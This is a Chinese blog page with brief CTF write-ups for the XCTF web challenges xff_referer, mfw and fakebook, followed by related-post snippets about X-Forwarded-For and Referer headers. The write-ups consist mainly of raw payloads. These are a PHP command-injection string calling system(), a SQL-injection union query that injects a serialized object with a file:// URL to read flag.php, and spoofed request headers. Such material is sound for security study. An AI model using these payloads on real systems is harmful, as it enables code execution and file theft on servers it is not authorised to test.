攻防世界-xff_referer+mfw+fakebook

安全专家1

已于 2022-08-03 16:36:04 修改

阅读量248

点赞数 1

分类专栏： ctf学习文章标签： web安全

于 2022-08-03 14:06:28 首次发布

本文链接：https://blog.youkuaiyun.com/xulei1132562/article/details/126139236

版权

ctf学习专栏收录该内容

13 篇文章

订阅专栏

X-Forwarded-For:123.123.123.123
Referer:https://www.google.com
在这里插入图片描述

?page=%27).system(%27cat+./templates/*%27);//

在这里插入图片描述

fakebook

view.php?no=2%20union/**/select%201,2,3,%27O:8:"UserInfo":3:{s:4:"name";s:3:"123";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}%27%20#

在这里插入图片描述

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

安全专家1

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

【网络安全 | CTF】攻防世界 xff_referer 解题详析

等风来

05-21

7242

（简称 XFF）是一个 HTTP 请求头部字段，它用于表示 HTTP 请求的客户端 IP 地址，尤其是当请求通过一个中介代理或负载均衡器时。该字段的值通常是一个逗号分隔的 IP 地址列表，其中第一个 IP 地址是最初连接到中介代理或负载均衡器的客户端 IP 地址。因为在这种情况下，服务器只能看到请求的中介代理或负载均衡器的 IP 地址，而无法直接获取客户端的真实 IP 地址。是另一个 HTTP 请求头部字段，它包含了当前请求的来源页面 URL 地址，即前一个页面的 URL 地址。

攻防世界 web xff_referer

Kni9hT's Blog

03-01

690

真棒！每个web题都能学点新东西，而且感觉很nb的样子。不像pwn，wtnl… 本题涉及： XFF： X-Forwarded-For（XFF）是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 referer: HTTP Referer是header的一部分，当浏览器向web服务器发送请求的时候，一般会带上Referer，告诉服务器该网页...

1 条评论您还未登录，请先登录后发表或查看评论

攻防世界----xff_referer

qq_45021843的博客

09-23

738

该题结合抓包、改包，考察XFF及referer，读者可躬身实践。我们下次再见喽。

攻防世界xff_referer（writeup）

热门推荐

slj1552560的博客

02-16

2万+

Part1:XFF与Referer基本了解关于xff和referer维基百科： X-Forwarded-For（XFF）是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 HTTP Referer是header的一部分，当浏览器向web服务器发送请求的时候，一般会带上Referer，告诉服务器该网页是从哪个页面链接过来的，服务器因此可以获得一些信息用于处理。简单地说，xff是告诉服务器当前请求者的最终ip的http请求头字段通常可以直接通过修改http

攻防世界——xff_referer

weixin_73668856的博客

11-23

925

新手web

攻防世界-web xff_Referer

m0_53533553的博客

09-11

2483

xff_Referer 扩展 xff Romote Address xff简称X-Forwarded-For X-Forwarded-For 是一个 HTTP 扩展头部，是用来识别通过HTTP代理，或，负载均衡方式，连接到Web服务器的客户端最原始的IP地址，的HTTP请求头字段。主要是为了让 Web 服务器获取访问用户的真实 IP 地址。那为什么 Web 服务器只有通过 X-Forwarded-For 头才能获取真实的 IP？ Remote Address代表的是当前HTTP请求的远程地址，即HTTP

攻防世界-web高手进阶区

zji

04-25

6934

文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结攻防世界-web高手进阶区提示：这里是记录web的题目，这里我基本不讲很多细节，请自行下载Burpsuite，web使用的等等工具。一、baby_web 非常的简单，bp抓包直接把1.php去掉后，就看的flag了。二、Training-WWW-Robots 非常的简单，点网页进去后，看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php，在

攻防世界-web-xff_referer

wuh2333的博客

04-16

976

攻防世界，xff, referer

攻防世界 web——xff_referer

XYZCG的博客

09-03

703

（1）X-Forwarded-For:简称XFF头，它代表客户端，也就是HTTP的请求端真实的IP，只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。由于很多用户通过代理服务器进行访问，服务器只能获取代理服务器的IP地址，而xff的作用在于记录用户的真实IP，以及代理服务器的IP。（2）HTTP Referer是header的一部分，当浏览器向web服务器发送请求的时候，一般会带上Referer，告诉服务器我是从哪个页面链接过来的，服务器基此可以获得一些信息用于处理。

攻防世界新手题——xff_referer

qq_62248023的博客

10-24

1113

X-Forwarded-For:简称XFF头，它代表客户端，也就是HTTP的请求端真实的IP，只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。Referer是 HTTP请求头的一部分，用于指示当前请求是从哪个页面链接过来的，当浏览器向web服务器发送请求的时候，头信息包含Referer。比如我在www.abc.com里有一个www.def.com链接，那么点击这个www.def.com，它的头信息里有：Referer=http://www.abc.com题目描述。

攻防世界 Web xff_referer

Emjl__的博客

05-10

2657

题目描述中说道 xff 和 referer 是可以伪造的。而这道题中我们就来伪造这二者。 X-Forward-For（xff）是客户端连接到网页的ip，referer是客户从哪个网页来访问的当前页面。打开 burp suite ，对网页抓包，发送给重发器（repeater）。要求 ip 为123.123.123.123，就在请求中添加 X-Forwarded-For: 123.123.123.123 发送。审查响应，发现要求客户从https://www.google.com发起请求。

【CTF | WEB】003、攻防世界WEB题目之xff_referer

韩非雨的博客

08-14

1522

XFF用于追踪客户端的真实 IP 地址，特别是在请求经过多个代理服务器时。Referer用于标识当前请求页面的来源页面，帮助服务器理解用户的访问路径。这两个头字段在网络安全和流量分析中都非常重要。

攻防世界web新手关之xff_referer

weixin_45746283的博客

11-16

2119

攻防世界web新手关之xff_referer

攻防世界15:xff-referer

weixin_49765221的博客

04-19

887

构造协议头

攻防世界 WEB新手 xff_referer

qq_38969294的博客

03-03

807

攻防世界 WEB新手 xff_referer 下面我们阅读题目： xff_referer35 最佳Writeup由话求 • DengZ提供难度系数：题目来源： Cyberpeace-n3k0 题目描述：X老师告诉小宁其实xff和referer是可以伪造的。题目场景： http://111.198.29.45:50503 删除场景倒计时：03:59:52 延时题目附件：暂无点击链接 ...

攻防世界-WEB：xff_referer

wlw1275178332的博客

03-18

412

请求刚从client1中发出时，XFF是空的，请求被发往proxy1；通过proxy1的时候，client1被添加到XFF中，之后请求被发往proxy2;通过proxy2的时候，proxy1被添加到XFF中，之后请求被发往proxy3；通过proxy3时，proxy2被添加到XFF中，之后请求的的去向不明，如果proxy3不是请求终点，请求会被继续转发。映入眼帘的就是IP地址，那根据上面我们所了解的，这应该就是我们要构造的xff的IP地址。使用bp抓包，在头部加上 xff（注意大写字母），然后放行。

攻防世界(WEB) xff_referer

qq_54929891的博客

08-26

2162

首先做之前，先去了解一下xff和referer是什么东西 xff：X-Forwarded-For（header里面的一部分）就是浏览器访问一个网站的ip地址详细可以看另一位博主https://blog.youkuaiyun.com/weixin_43605586/article/details/100607877?utm_term=xff%E6%98%AF%E4%BB%80%E4%B9%88%E4%B9%88&utm_medium=distribute.pc_aggpage_search_result.

攻防世界 xff_referer hackbar

02-25

### 攻防世界 XFF Referer HackBar 使用教程 #### 1. X-Forwarded-For (XFF) 和 Referer 头简介 X-Forwarded-For (XFF) 是 HTTP 请求头的一部分，通常由代理服务器添加，用于标识客户端 IP 地址。Referer 头则告知服务器当前请求是从哪个 URL 发起的。这两个头部信息可以被拦截并篡改，从而实现伪造 IP 或来源页面的效果[^1]。 #### 2. 安装和配置 HackBar 插件为了方便操作这些 HTTP 头部信息，推荐使用 HackBar 浏览器插件： - **获取 HackBar** - 可以从 GitHub 上找到无需 License 的版本进行下载[^3]。 - **安装过程** - 将下载好的文件夹解压缩； - 进入浏览器设置 -> 更多工具 -> 扩展程序； - 启用开发者模式，点击加载已解压的扩展程序； - 选择刚刚解压出来的目录完成加载； #### 3. 利用 HackBar 修改 XFF 和 Referer 一旦成功安装好 HackBar 工具，在实际应用过程中就可以轻松更改上述两个重要的 HTTP 请求头字段了： ```bash # 设置自定义的 X-Forwarded-For 值 X-Forwarded-For: 123.123.123.123 # 自定义 Referer 字段的内容 Referer: http://example.com/ ``` 以上命令可以直接输入到 HackBar 提供的操作界面里执行，以此达到伪装真实访问源的目的[^4]。 #### 4. 注意事项尽管能够利用此类技术手段来进行安全测试或学习研究，但在未经授权的情况下对他人网站实施任何形式的攻击都是违法行为，请务必遵守法律法规以及道德准则！